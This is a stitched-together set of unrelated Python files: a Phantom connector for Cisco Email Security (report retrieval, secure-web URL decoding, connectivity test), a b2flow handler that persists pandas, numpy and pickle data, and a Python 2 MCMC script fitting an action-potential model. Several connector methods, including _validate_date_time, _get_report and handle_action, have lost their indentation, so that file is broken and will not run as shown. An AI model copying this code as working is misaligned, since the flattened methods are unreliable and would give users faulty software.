    # The platform helper covers IPv4; accept immediately when it matches.
    if phantom.is_ip(ip_address):
        return True
    # Otherwise fall back to an IPv6 parse attempt.
    try:
        socket.inet_pton(socket.AF_INET6, ip_address)
    except socket.error:
        return False
    return True
class CiscoesaConnector(BaseConnector):
    """ This is an AppConnector class that inherits the BaseConnector class. It implements various actions supported by
    Cisco ESA and helper methods required to run the actions.
    """

    def __init__(self):
        # Calling the BaseConnector's init function
        super(CiscoesaConnector, self).__init__()
        self._url = None
        self._username = None
        # BUG FIX: the placeholder token "<PASSWORD>" was not valid Python.
        # The password stays unset until initialize() reads it from the asset config.
        self._password = None
        self._verify_server_cert = False
        return
    def initialize(self):
        """ This is an optional function that can be implemented by the AppConnector derived class. Since the
        configuration dictionary is already validated by the time this function is called, it's a good place to do any
        extra initialization of any internal modules. This function MUST return a value of either phantom.APP_SUCCESS or
        phantom.APP_ERROR. If this function returns phantom.APP_ERROR, then AppConnector::handle_action will not get
        called.
        """
        config = self.get_config()
        # Strip surrounding "/" characters so endpoint paths can be appended directly
        self._url = config[consts.CISCOESA_CONFIG_URL].strip("/")
        self._username = config[consts.CISCOESA_CONFIG_USERNAME]
        self._password = config[consts.CISCOESA_CONFIG_PASSWORD]
        self._verify_server_cert = config.get(consts.CISCOESA_CONFIG_VERIFY_SSL, False)
        # In "get report" action, if "starts_with" parameter is set, validate IP and email
        # Disable the platform's default validators here; _get_report does its own validation
        self.set_validator(consts.CISCOESA_CONTAINS_IP, None)
        self.set_validator(consts.CISCOESA_CONTAINS_EMAIL, None)
        return phantom.APP_SUCCESS
    def _parse_report_data(self, report_data, action_result):
        """ Function to parse report data by converting its value from object to list format to make output of all
        reports consistent.

        :param report_data: report data
        :param action_result: Object of ActionResult class
        :return: status success/failure and (parsed report data or None)
        """
        # Parsing values of report data by assigning report_key value to "recipient" key and its count to "count" key
        # NOTE: only values of existing keys are reassigned while iterating, which
        # is safe — no keys are added to or removed from the dict during iteration.
        for report_key, report_value in report_data[consts.CISCOESA_GET_REPORT_PARAM_DATA].items():
            # List that will contain parsed values of report data that will be assigned to corresponding keys of report
            parsed_result = []
            # If report value is there, then value will be parsed
            if report_value:
                try:
                    for recipient, count in report_data[consts.CISCOESA_GET_REPORT_PARAM_DATA][report_key].items():
                        parsed_result.append({
                            consts.CISCOESA_GET_REPORT_PARAM_RECIPIENT: recipient,
                            consts.CISCOESA_GET_REPORT_PARAM_COUNT: count
                        })
                except Exception as error:
                    self.debug_print(consts.CISCOESA_GET_REPORT_PARSE_ERROR.format(error))
                    # set the action_result status to error, the handler function will most probably return as is
                    return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_GET_REPORT_PARSE_ERROR.format(
                        error
                    )), None
            # Empty/falsy values are normalized to an empty list as well
            report_data[consts.CISCOESA_GET_REPORT_PARAM_DATA][report_key] = parsed_result
        return phantom.APP_SUCCESS, report_data
def _validate_date_time(self, date_time_value, action_result):
""" Function used to validate date and time format. As per the app configuration, date and time must be provided
in YYYY-MM-DDTHH:00 format.
:param date_time_value: date and time value that needs to be split and validated
:param action_result: Object of ActionResult class
:return: status success/failure and (parsed datetime or None)
"""
date_time = date_time_value.split("T")
# If given datetime not in expected format
if len(date_time) <= 1:
self.debug_print(consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_DATE_TIME_FORMAT_ERROR), None
if len(date_time[1].split(":")) != 2:
self.debug_print(consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_DATE_TIME_FORMAT_ERROR), None
date = date_time[0].split("-")
hour = date_time[1].split(":")[0]
if len(date) != 3:
self.debug_print(consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_DATE_TIME_FORMAT_ERROR), None
try:
parsed_date_time = datetime.datetime(
year=int(date[0]), month=int(date[1]), day=int(date[2]), hour=int(hour)
)
except:
self.debug_print(consts.CISCOESA_DATE_TIME_VALIDATION_ERROR)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_DATE_TIME_VALIDATION_ERROR), None
return phantom.APP_SUCCESS, parsed_date_time
    def _make_rest_call(self, endpoint, action_result, params=None, method="get", timeout=None):
        """ Function that makes the REST call to the device. It is a generic function that can be called from various
        action handlers.

        :param endpoint: REST endpoint that needs to be appended to the service address
        :param action_result: object of ActionResult class
        :param params: request parameters if method is get
        :param method: get/post/put/delete ( Default method will be "get" )
        :param timeout: request timeout in seconds
        :return: status success/failure(along with appropriate message), response obtained by making an API call
        """
        response_data = None
        # Resolve the requests function (requests.get/post/...) by name
        try:
            request_func = getattr(requests, method)
        except AttributeError:
            self.debug_print(consts.CISCOESA_ERR_API_UNSUPPORTED_METHOD.format(method=method))
            # set the action_result status to error, the handler function will most probably return as is
            return action_result.set_status(
                phantom.APP_ERROR, consts.CISCOESA_ERR_API_UNSUPPORTED_METHOD
            ), response_data
        except Exception as e:
            self.debug_print(consts.CISCOESA_EXCEPTION_OCCURRED, e)
            # set the action_result status to error, the handler function will most probably return as is
            return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_EXCEPTION_OCCURRED, e), response_data
        # HTTP Basic auth header built from the credentials read in initialize()
        auth_string = "{username}:{password}".format(username=self._username, password=self._password)
        credentials = base64.b64encode(auth_string.encode('utf-8')).decode()
        headers = {
            "Accept": "application/json",
            "Authorization": "Basic {credentials}".format(credentials=credentials)
        }
        try:
            response = request_func("{base_url}{endpoint}".format(base_url=self._url, endpoint=endpoint),
                                    params=params, headers=headers, timeout=timeout, verify=self._verify_server_cert)
        except Exception as e:
            self.debug_print(consts.CISCOESA_ERR_SERVER_CONNECTION, e)
            # set the action_result status to error, the handler function will most probably return as is
            return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_ERR_SERVER_CONNECTION, e), response_data
        # Try parsing the json; fall back to raw text for non-JSON content types
        try:
            content_type = response.headers.get("content-type")
            if content_type and content_type.find("json") != -1:
                response_data = response.json()
            else:
                response_data = response.text
        except Exception as e:
            # r.text is guaranteed to be NON None, it will be empty, but not None
            msg_string = consts.CISCOESA_ERR_JSON_PARSE.format(raw_text=response.text)
            self.debug_print(msg_string, e)
            # set the action_result status to error, the handler function will most probably return as is
            return action_result.set_status(phantom.APP_ERROR, msg_string, e), response_data
        # Known HTTP error codes get the mapped message from ERROR_RESPONSE_DICT
        if response.status_code in ERROR_RESPONSE_DICT:
            message = ERROR_RESPONSE_DICT[response.status_code]
            # overriding message if available in response
            if isinstance(response_data, dict):
                message = response_data.get("error", {}).get("message", message)
            self.debug_print(consts.CISCOESA_ERR_FROM_SERVER.format(status=response.status_code, detail=message))
            # set the action_result status to error, the handler function will most probably return as is
            return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_ERR_FROM_SERVER,
                                            status=response.status_code, detail=message), response_data
        # In case of success scenario
        if response.status_code == consts.CISCOESA_REST_RESP_SUCCESS:
            # If response obtained is not in object format
            if not isinstance(response_data, dict):
                self.debug_print(consts.CISCOESA_UNEXPECTED_RESPONSE.format(report_name=response_data))
                return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_UNEXPECTED_RESPONSE.format(
                    report_name=response_data
                )), response_data
            return phantom.APP_SUCCESS, response_data
        # If response code is unknown
        message = consts.CISCOESA_REST_RESP_OTHER_ERROR_MSG
        if isinstance(response_data, dict):
            message = response_data.get("error", {}).get("message", message)
        self.debug_print(consts.CISCOESA_ERR_FROM_SERVER.format(status=response.status_code, detail=message))
        # All other response codes from REST call
        # Set the action_result status to error, the handler function will most probably return as is
        return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_ERR_FROM_SERVER,
                                        status=response.status_code,
                                        detail=message), response_data
    def _decode_url(self, param):
        """ Process URL and return it stripped
        of the 'secure-web.cisco.com' portion and unquoted

        :param param: dictionary of input parameters (expects key 'encoded_url')
        :return: status success/failure
        """
        self.save_progress("Decoding URL")
        action_result = self.add_action_result(ActionResult(dict(param)))
        encoded_url = param['encoded_url']
        # Capture the percent-encoded tail of a Cisco secure-web rewrite URL
        sw_match = re.match(r'^(https?://)?secure-web\.cisco\.com/.+/(?P<quoted>.+)$', encoded_url)
        # Parse the URL if it looks like what we are expecting otherwise return the whole URL unquoted.
        if sw_match:
            message = 'Parsed from secure-web.cisco.com URL and decoded'
            if sw_match.group('quoted'):
                decode_me = sw_match.group('quoted')
            else:
                # Fallback: take everything after the last slash
                decode_me = encoded_url.split('/')[-1]
        else:
            message = 'Decoded entire URL'
            decode_me = encoded_url
        action_result.add_data({'decoded_url': urllib.parse.unquote(decode_me)})
        self.save_progress("Decoding URL succeeded")
        return action_result.set_status(phantom.APP_SUCCESS, message)
def _get_report(self, param):
""" Function to retrieve statistical report from the Email Security appliance.
:param param: dictionary of input parameters
:return: status success/failure
"""
action_result = self.add_action_result(ActionResult(dict(param)))
result_data = dict()
api_params = dict()
# Getting mandatory parameters
report_title = param[consts.CISCOESA_GET_REPORT_JSON_REPORT_TITLE]
# Getting optional parameters
start_time = param.get(consts.CISCOESA_GET_REPORT_JSON_START_TIME)
end_time = param.get(consts.CISCOESA_GET_REPORT_JSON_END_TIME)
search_value = param.get(consts.CISCOESA_GET_REPORT_JSON_SEARCH_VALUE)
limit = int(param.get(consts.CISCOESA_GET_REPORT_JSON_LIMIT, consts.CISCOESA_DEFAULT_LIMIT))
starts_with = param.get(consts.CISCOESA_GET_REPORT_JSON_STARTS_WITH)
# If both start_time and end_time is not given, then by default, API will query report for last 250 days
if not start_time and not end_time:
start_time = (datetime.datetime.now() - datetime.timedelta(
days=consts.CISCOESA_DEFAULT_SPAN_DAYS
)).strftime(consts.CISCOESA_INPUT_TIME_FORMAT)
end_time = datetime.datetime.now().strftime(consts.CISCOESA_INPUT_TIME_FORMAT)
# If start_time is given, but end_time is not given
elif not end_time:
try:
# end_time will be calculated equivalent to given start_time
end_time = datetime.datetime.strptime(start_time, consts.CISCOESA_INPUT_TIME_FORMAT) + \
datetime.timedelta(days=consts.CISCOESA_DEFAULT_SPAN_DAYS)
# If calculated end_time is a future date, then it will be replaced by current date
if datetime.datetime.strptime(start_time, consts.CISCOESA_INPUT_TIME_FORMAT) + datetime.timedelta(
days=consts.CISCOESA_DEFAULT_SPAN_DAYS) >= datetime.datetime.now():
end_time = datetime.datetime.now()
except:
self.debug_print(consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
# Converting date in string format
end_time = end_time.strftime(consts.CISCOESA_INPUT_TIME_FORMAT)
# If start_time is not given, but end_time is given
elif not start_time:
try:
# start_time will be calculated equivalent to given end_time
temp_time1 = datetime.datetime.strptime(end_time, consts.CISCOESA_INPUT_TIME_FORMAT)
temp_time2 = datetime.timedelta(days=consts.CISCOESA_DEFAULT_SPAN_DAYS)
start_time = ( temp_time1 - temp_time2 ).strftime(consts.CISCOESA_INPUT_TIME_FORMAT)
except:
self.debug_print(consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_DATE_TIME_FORMAT_ERROR)
# Validating start_time
validate_status, parsed_start_time = self._validate_date_time(start_time, action_result)
# Something went wrong while validating start_time
if phantom.is_fail(validate_status):
return action_result.get_status()
# Validating end_time
validate_status, parsed_end_time = self._validate_date_time(end_time, action_result)
# Something went wrong while validating end_time
if phantom.is_fail(validate_status):
return action_result.get_status()
# Comparing start time and end time
if parsed_start_time >= parsed_end_time:
self.debug_print(consts.CISCOESA_START_TIME_GREATER_THEN_END_TIME)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_START_TIME_GREATER_THEN_END_TIME)
# if starts_with parameter is not set, then IP and email must be validated
if not starts_with and search_value and report_title in \
[consts.CISCOESA_MAIL_INCOMING_IP_HOSTNAME_DETAILS_REPORT_TITLE,
consts.CISCOESA_MAIL_OUTGOING_SENDERS_IP_HOSTNAME_DETAILS_REPORT_TITLE,
consts.CISCOESA_MAIL_USER_DETAILS_REPORT_TITLE]:
# Search value should be validated to be either an IP address or an email, if report title is
# "Incoming Mail: IP Addresses", "Outgoing Senders: IP Addresses" or "Internal Users"
if not _is_ip(search_value) and not phantom.is_email(search_value):
self.debug_print(consts.CISCOESA_SEARCH_VALUE_VALIDATION_FAIL)
return action_result.set_status(phantom.APP_ERROR, consts.CISCOESA_SEARCH_VALUE_VALIDATION_FAIL)
# Report will be queried for last given duration period
# Time zone that will be considered for calculating time and date will be GMT having 00:00 offset from UTC
# Time to query the report supports only 00 minutes
try:
start_time = parsed_start_time.strftime(consts.CISCOESA_API_TIME_FORMAT)
end_time = parsed_end_time.strftime(consts.CISCOESA_API_TIME_FORMAT)
except Exception as error:
self.debug_print(error)
return action_result.set_status(phantom.APP_ERROR, error)
api_params[consts.CISCOESA_GET_REPORT_PARAM_DURATION] = consts.CISCOESA_DURATION_FORMAT.format(
start_time=start_time, end_time=end_time
)
# Obtain report name
report_name = REPORT_TITLE_TO_NAME_AND_FILTER_MAPPING[report_title]
# You cannot use the entity and max=n attributes in the same request.
# If entity is given to filter a report, then limit will not be provided while making REST call
if search_value:
api_params[consts.CISCOESA_GET_REPORT_PARAM_ENTITY] = search_value
api_params.pop(consts.CISCOESA_GET_REPORT_PARAM_MAX, None)
# If entity is given to filter the result and "starts_with" is set, then only "starts_with" parameter will
# be set in api_params
if starts_with:
api_params[consts.CISCOESA_GET_REPORT_JSON_STARTS_WITH] = starts_with
# If limit is given and entity is not provided to filter the report data, then "entity" and "starts_with"
# keys will be removed from api_params object
elif limit or limit == 0:
api_params[consts.CISCOESA_GET_REPORT_PARAM_MAX] = int(limit)
api_params.pop(consts.CISCOESA_GET_REPORT_PARAM_ENTITY, None)
api_params.pop(consts.CISCOESA_GET_REPORT_JSON_STARTS_WITH, None)
report_endpoint = consts.CISCOESA_GET_REPORT_ENDPOINT.format(report_name=report_name)
self.send_progress(consts.CISCOESA_GET_REPORT_INTERMEDIATE_MSG.format(report_title=report_title))
# Making REST call to get report data
response_status, report_data = self._make_rest_call(report_endpoint, action_result, params=api_params)
# Something went wrong while querying a report
if phantom.is_fail(response_status):
self.debug_print(consts.CISCOESA_GET_REPORT_ERROR.format(report_title=report_title))
return action_result.get_status()
# If report is queried by providing an entity to filter results, then its response data needs to be
# formatted in generic format
if search_value and report_data.get(consts.CISCOESA_GET_REPORT_PARAM_DATA, {}):
parsed_dict = dict()
for matching_key in report_data[consts.CISCOESA_GET_REPORT_PARAM_DATA].keys():
for key, value in report_data[consts.CISCOESA_GET_REPORT_PARAM_DATA][matching_key].items():
if key not in parsed_dict:
parsed_dict[key] = dict()
parsed_dict[key][matching_key] = value
report_data[consts.CISCOESA_GET_REPORT_PARAM_DATA] = parsed_dict
# Parsing report data
if report_data.get(consts.CISCOESA_GET_REPORT_PARAM_DATA):
parse_data_status, report_data = self._parse_report_data(report_data, action_result)
if phantom.is_fail(parse_data_status):
return action_result.get_status()
result_data[report_name] = report_data
action_result.add_data(result_data)
return action_result.set_status(phantom.APP_SUCCESS, consts.CISCOESA_REPORTS_QUERIED_SUCCESS_MSG)
    def _test_asset_connectivity(self, param):
        """ This function tests the connectivity of an asset with given credentials.

        :param param: (not used in this method)
        :return: status success/failure
        """
        # Standalone ActionResult — connectivity outcome is reported via progress/status
        action_result = ActionResult()
        self.save_progress(consts.CISCOESA_CONNECTION_TEST_MSG)
        self.save_progress("Configured URL: {url}".format(url=self._url))
        # 30-second timeout so an unreachable appliance fails fast
        ret_value, response = self._make_rest_call(endpoint=consts.CISCOESA_TEST_CONNECTIVITY_ENDPOINT,
                                                   action_result=action_result, timeout=30)
        if phantom.is_fail(ret_value):
            self.save_progress(action_result.get_message())
            self.set_status(phantom.APP_ERROR, consts.CISCOESA_TEST_CONNECTIVITY_FAIL)
            return action_result.get_status()
        self.set_status_save_progress(phantom.APP_SUCCESS, consts.CISCOESA_TEST_CONNECTIVITY_PASS)
        return action_result.get_status()
def handle_action(self, param):
""" This function gets current action identifier and calls member function of its own to handle the action.
:param param: dictionary which contains information about the actions to be executed
:return: status success/failure
"""
# Dictionary mapping each action with its corresponding actions
action_mapping = {
"test_asset_connectivity": self._test_asset_connectivity,
"get_report": self._get_report,
"decode_url": self._decode_url
}
action = self.get_action_identifier()
try:
run_action = action_mapping[action]
except:
raise ValueError("action {action} is not supported".format(action=action))
return run_action(param)
    def finalize(self):
        """ This function gets called once all the param dictionary elements are looped over and no more handle_action
        calls are left to be made. It gives the AppConnector a chance to loop through all the results that were
        accumulated by multiple handle_action function calls and create any summary if required. Another usage is
        cleanup, disconnect from remote devices etc.
        """
        # No per-run cleanup is needed for this connector
        return phantom.APP_SUCCESS
if __name__ == "__main__":
    # Standalone test harness: run an action from a JSON file through the connector
    import sys
    import pudb

    # Drop straight into the debugger for interactive testing
    pudb.set_trace()
    if len(sys.argv) < 2:
        print("No test json specified as input")
        sys.exit(0)
    with open(sys.argv[1]) as f:
        in_json = f.read()
        in_json = json.loads(in_json)
        print(json.dumps(in_json, indent=4))
        connector = CiscoesaConnector()
        connector.print_progress_message = True
        # BaseConnector._handle_action expects the serialized JSON string
        return_value = connector._handle_action(json.dumps(in_json), None)
        print(json.dumps(json.loads(return_value), indent=4))
    sys.exit(0)
|
<filename>b2flow/python/tools/handler.py
import json
import pandas as pd
import numpy as np
import datetime
import pickle as pk
class Metadata:
    """JSON (de)serialization helpers for handler metadata records."""

    @staticmethod
    def encode(data: dict):
        # Serialize a metadata dictionary to a JSON string.
        return json.dumps(data)

    @staticmethod
    def decode(data: bytes):
        # Parse raw JSON bytes/text back into a dictionary.
        return json.loads(data)
class Handler:
    """Abstract base for storage-backed persistence handlers."""

    def __init__(self, storage):
        # Storage backend shared by all operations of this handler.
        self.storage = storage

    def write(self, obj, filename, compress: bool = False):
        """Persist *obj* under *filename*; concrete subclasses override this."""

    def read(self, name):
        """Load the object stored under *name*; concrete subclasses override this."""
def format_value(batch):
    """Render each item as a string with backslashes escaped; None becomes ""."""
    return [
        "" if item is None else str(item).replace('\\', '\\\\')
        for item in batch
    ]
def format_bool(batch):
    """Encode booleans as "1"/"0"; None (missing) becomes the empty string."""
    return [
        "" if item is None else ("1" if item else "0")
        for item in batch
    ]
def encode(batch, dtype):
    """Serialize a column batch to newline-separated UTF-8 bytes.

    Boolean dtypes go through format_bool ("1"/"0"); everything else
    through format_value (escaped str()).
    """
    formatter = format_bool if str(dtype) == str(np.dtype("bool")) else format_value
    return "\n".join(formatter(batch)).encode()
def decode(data, dtype):
    """Inverse of encode(): split newline-separated bytes back into values.

    Boolean columns map "1" -> True, "0" -> False and anything else
    (the "" used for missing values) -> None; other dtypes are returned
    as the raw string entries.
    """
    entries = data.decode().split("\n")
    if str(dtype) != str(np.dtype("bool")):
        return entries
    truth_table = {"1": True, "0": False}
    # dict.get defaults to None, covering the missing-value sentinel
    return [truth_table.get(entry) for entry in entries]
class PandasHandler(Handler):
    # Columnar persistence for DataFrames: one storage folder per frame, a
    # "_metadata" JSON record (columns, dtypes, row count, timestamp, compress
    # flag) plus a "_data/<column>/" folder of newline-separated text batches.

    def write(self, df: pd.core.frame.DataFrame, name: str, batch_size=1024000, compress=False):
        """
        Persist a Pandas DataFrame in remote storage
        @param df: Pandas DataFrame
        @param name: Name will be stored
        @param batch_size: How many items per batch
        @param compress: Compress data with GZIP before save
        """
        storage = self.storage.path(name)
        storage_data = storage.path("_data")
        metadata = {
            'columns': df.columns.tolist(),
            'dtypes': df.dtypes.apply(lambda x: x.name).to_dict(),
            'count': len(df),
            'created_at': datetime.datetime.now().isoformat(),
            'compress': compress
        }
        storage.write(Metadata.encode(metadata), "_metadata")
        for column, dtype in metadata['dtypes'].items():
            values = df[column]
            count = 0
            # Batch file names are zero-padded so a lexicographic listing
            # preserves write order when the frame is restored.
            for i in range(0, len(df), batch_size):
                count += 1
                data = encode(values[i:i+batch_size], dtype)
                storage_data.path(column).write(data, f"{str(count).zfill(10)}", compress=compress)

    def read(self, name: str):
        """
        Restore a persisted Pandas DataFrame in memory
        @param name: Name of Pandas DataFrame will be restored
        @return: pd.core.frame.DataFrame
        """
        storage = self.storage.path(name)
        storage_data = storage.path("_data")
        metadata = Metadata.decode(storage.read("_metadata"))
        data = {}
        for column, dtype in metadata['dtypes'].items():
            data[column] = []
            # assumes storage .list() yields batch entries in name order -- TODO confirm
            for entry in storage_data.path(column).list():
                data[column] += decode(entry.read(), dtype)
            # Restore the original dtype recorded in the metadata
            data[column] = pd.Series(data[column], dtype=np.dtype(dtype))
        return pd.DataFrame(data)
class NumpyHandler(Handler):
    # Persists arrays as raw .tobytes() batches under "_data/" plus a
    # "_metadata" JSON record (shape, dtype, length, timestamp, compress flag).

    def write(self, arr: np.array, name: str, batch_size=1024000, compress=False):
        """
        Persist a Numpy Array in remote storage
        @param arr: Numpy Array that will be persisted
        @param name: Name will be stored
        @param batch_size: How many items per batch will be persisted
        @param compress: Compress data with GZIP before save
        """
        storage = self.storage.path(name)
        storage_data = storage.path("_data")
        metadata = {
            'shape': list(arr.shape),
            'dtype': str(arr.dtype),
            'count': len(arr),
            'created_at': datetime.datetime.now().isoformat(),
            'compress': compress
        }
        storage.write(Metadata.encode(metadata), "_metadata")
        count = 0
        # Batches split along the first axis; zero-padded names keep ordering
        for i in range(0, metadata["count"], batch_size):
            count += 1
            batch = arr[i:i+batch_size]
            storage_data.write(batch.tobytes(), f"{str(count).zfill(10)}", compress=compress)

    def read(self, name: str):
        """
        Restore a persisted Numpy Array in memory
        @param name: Name of Numpy Array will be restored
        @return: numpy.array
        """
        storage = self.storage.path(name)
        storage_data = storage.path("_data")
        metadata = Metadata.decode(storage.read("_metadata"))
        dtype = np.dtype(metadata['dtype'])
        # -1 in the first axis lets each batch carry a variable number of rows
        # while preserving the trailing dimensions recorded in the metadata.
        shape = (-1, ) + tuple(metadata['shape'][1:])
        results = []
        # assumes storage .list() yields batch entries in name order -- TODO confirm
        for entry in storage_data.list():
            results.append(np.frombuffer(entry.read(), dtype=dtype).reshape(shape))
        return np.concatenate(results)
class PickleHandler(Handler):
    # Persists arbitrary Python objects via pickle under "_data/data.pk"
    # plus a "_metadata" JSON record (class name, timestamp, compress flag).

    def write(self, obj, name: str, compress=False):
        """
        Persist a Pickle in remote storage
        @param obj: Any Object that will be persisted
        @param name: Name will be stored
        @param compress: Compress data with GZIP before save
        """
        storage = self.storage.path(name)
        storage_data = storage.path("_data")
        metadata = {
            'class': str(type(obj)),
            'created_at': datetime.datetime.now().isoformat(),
            'compress': compress
        }
        storage.write(Metadata.encode(metadata), "_metadata")
        # protocol=4 keeps the payload readable from Python 3.4+
        storage_data.write(pk.dumps(obj, protocol=4), "data.pk", compress=compress)

    def read(self, name):
        """
        Restore a persisted Pickle in memory
        @param name: Name of Pickle will be restored
        @return: pickle
        """
        storage_data = self.storage.path(name).path("_data")
        # SECURITY NOTE: pk.loads executes code embedded in the pickle stream;
        # only read from trusted storage.
        return pk.loads(storage_data.read("data.pk"))
class Handlers:
    """Facade bundling one handler of each kind over the same storage backend."""

    def __init__(self, storage):
        self.storage = storage
        self.pandas = PandasHandler(storage)    # DataFrames (columnar batches)
        self.numpy = NumpyHandler(storage)      # ndarrays (raw byte batches)
        self.pickle = PickleHandler(storage)    # arbitrary pickled objects
# --- Synthetic non-hierarchical MCMC for an action-potential model (Python 2) ---
import ap_simulator as ap
import mcmc_setup as ms
import numpy as np
import numpy.random as npr
import matplotlib.pyplot as plt
import time
import sys

# Model index comes from the command line; protocol and simulator seed are fixed here
model = int(sys.argv[1])
protocol = 1
c_seed = 1
noise_sd = 0.25  # known noise level used to generate the synthetic data

original_gs, g_parameters = ms.get_original_params(model)  # list, list
chain_file, figs_dir = ms.synthetic_nonhierarchical_chain_file_and_figs_dir(model,protocol,c_seed)

# Start the chain file with a header describing this run
with open(chain_file,"w") as outfile:
    outfile.write("# Synthetic nonhierarchical MCMC\n")
    outfile.write("# Model {}, protocol {}, c_seed {}\n".format(model,protocol,c_seed))
    outfile.write("# noise_sd {}\n".format(noise_sd))

# Seed numpy's RNG independently of the C simulator's seed
python_seed = c_seed+1
npr.seed(python_seed)
def normal_loglikelihood_uniform_priors(test_trace, expt_trace, sigma):
    """Gaussian log-likelihood (up to an additive constant) under flat priors."""
    residuals = test_trace - expt_trace
    num_pts = len(test_trace)
    return -num_pts * np.log(sigma) - np.sum(residuals ** 2) / (2. * sigma ** 2)
# NOTE(review): duplicate of the call made above — harmless, same paths returned
chain_file, figs_dir = ms.synthetic_nonhierarchical_chain_file_and_figs_dir(model,protocol,c_seed)

# Simulation time grid (ms)
start_time = 0.
end_time = 400.
timestep = 0.2
expt_times = np.arange(start_time,end_time+timestep,timestep)

# Configure the simulator and generate the synthetic "experimental" trace
cell = ap.APSimulator()
cell.DefineProtocol(protocol)
cell.DefineModel(model)
expt_trace = cell.GenerateSyntheticExptTrace(original_gs,noise_sd,c_seed)

# Initial MCMC state: true conductances plus an initial sigma guess
sigma_cur = 0.25
theta_cur = np.copy(original_gs+[sigma_cur])
mean_estimate = np.copy(theta_cur)
test_trace = cell.SolveForVoltageTraceWithParams(original_gs)
log_target_cur = normal_loglikelihood_uniform_priors(test_trace,expt_trace,sigma_cur)

# Plot the initial model trace against the synthetic data
fig = plt.figure()
ax = fig.add_subplot(111)
ax.grid()
ax.set_xlabel('Time (ms)')
ax.set_ylabel('Membrane voltage (mV)')
ax.plot(expt_times,expt_trace,color='red',label='Synthetic expt')
ax.plot(expt_times,test_trace,color='blue',label='Initial')
ax.legend()
fig.tight_layout()
fig.savefig(figs_dir+'initial_and_expt_traces.png')
plt.close()

print "log_target_cur:", log_target_cur

# MCMC bookkeeping and adaptive-proposal settings
num_params = len(theta_cur)
first_iteration = np.concatenate((theta_cur,[log_target_cur]))
loga = 0.
initial_proposal_scale = 0.01
cov_estimate = initial_proposal_scale*np.diag(theta_cur**2)
acceptance = 0.
acceptance_target = 0.25
when_to_adapt = 100*num_params

num_total_iterations = 200000
thinning = 5
assert(num_total_iterations%thinning==0)
num_saved_iterations = num_total_iterations/thinning  # Python 2 integer division
how_many_updates = 20
when_to_update = num_total_iterations / how_many_updates

# Figure that accumulates the post-burn-in sampled traces
fig = plt.figure()
ax = fig.add_subplot(111)
ax.grid()
ax.set_xlabel('Time (ms)')
ax.set_ylabel('Membrane voltage (mV)')
ax.set_title('All (post-burn, thinned) MCMC sample traces')

burn = num_saved_iterations/4
mcmc = np.zeros((num_saved_iterations+1,num_params+1))
mcmc[0,:] = first_iteration
start = time.time()
# Adaptive-covariance Metropolis-Hastings main loop
for it in xrange(1,num_total_iterations+1):
    accepted = 0.
    # Propose from a multivariate normal centred on the current state
    theta_star = npr.multivariate_normal(theta_cur,np.exp(loga)*cov_estimate)
    # All parameters (conductances and sigma) must stay positive;
    # otherwise the proposal is rejected outright
    if np.all(theta_star>0):
        test_trace = cell.SolveForVoltageTraceWithParams(theta_star[:-1])
        log_target_star = normal_loglikelihood_uniform_priors(test_trace,expt_trace,theta_star[-1])
        # Metropolis accept/reject step
        alpha = npr.rand()
        if ( np.log(alpha) < log_target_star-log_target_cur ):
            theta_cur = theta_star
            log_target_cur = log_target_star
            accepted = 1.
    # Save every "thinning"-th state; also overlay post-burn-in traces on the plot
    if (it%thinning==0):
        mcmc[it/thinning,:] = np.concatenate((theta_cur,[log_target_cur]))
        if (it>=burn):
            ax.plot(expt_times,test_trace,alpha=0.01)
    # Vanishing adaptation of the proposal covariance and global scale
    if (it>when_to_adapt):
        s = it - when_to_adapt
        gamma_s = 1./(s+1.)**0.6
        temp_covariance_bit = np.array([theta_cur-mean_estimate])
        cov_estimate = (1-gamma_s) * cov_estimate + gamma_s * temp_covariance_bit.T.dot(temp_covariance_bit)
        mean_estimate = (1-gamma_s) * mean_estimate + gamma_s * theta_cur
        loga += gamma_s*(accepted-acceptance_target)
    # Running acceptance rate
    acceptance = ((it-1.)*acceptance + accepted)/it
    # Periodic progress report with an ETA
    if (it%when_to_update==0):
        time_taken_so_far = time.time()-start
        estimated_time_left = time_taken_so_far/it*(num_total_iterations-it)
        print it/when_to_update, "/", how_many_updates
        print "Time taken: {} s = {} min".format(round(time_taken_so_far,1),round(time_taken_so_far/60.,2))
        print "acceptance:", acceptance
        print "loga:", loga
        print "Estimated time remaining: {} s = {} min".format(round(estimated_time_left,1),round(estimated_time_left/60.,2))
time_taken = time.time()-start
print "Time taken: {} s".format(round(time_taken,2))

# Overlay the synthetic data on the sampled traces and save the figure
ax.plot(expt_times,expt_trace,color='red',label='Synthetic expt')
ax.legend()
fig.tight_layout()
fig.savefig(figs_dir+'mcmc_sample_traces.png')
plt.close()

# Append the whole (thinned) chain to the chain file
with open(chain_file,"a") as outfile:
    np.savetxt(outfile,mcmc)

# Marginal posterior histogram for each parameter (sigma is the last column)
for i in xrange(num_params):
    if (i<num_params-1):
        original_value = original_gs[i]
        label = g_parameters[i]
    elif (i==num_params-1):
        original_value = noise_sd
        label = r"\sigma"
    fig = plt.figure()
    ax = fig.add_subplot(111)
    ax.grid()
    ax.hist(mcmc[burn:,i],normed=True,bins=40,color='blue',edgecolor='blue')
    # Red line marks the true value used to generate the data
    ax.axvline(original_value,color='red',lw=2)
    ax.set_ylabel('Probability density')
    ax.set_xlabel('$'+label+'$')
    fig.tight_layout()
    fig.savefig(figs_dir+label.translate(None,r'\\{}')+'_marginal.png') # need double slashes to get rid of the sigma slash for some reason
    plt.close()
|
<reponame>clach04/bitbucket-_tools
#!/usr/bin/env python
# -*- coding: us-ascii -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
#
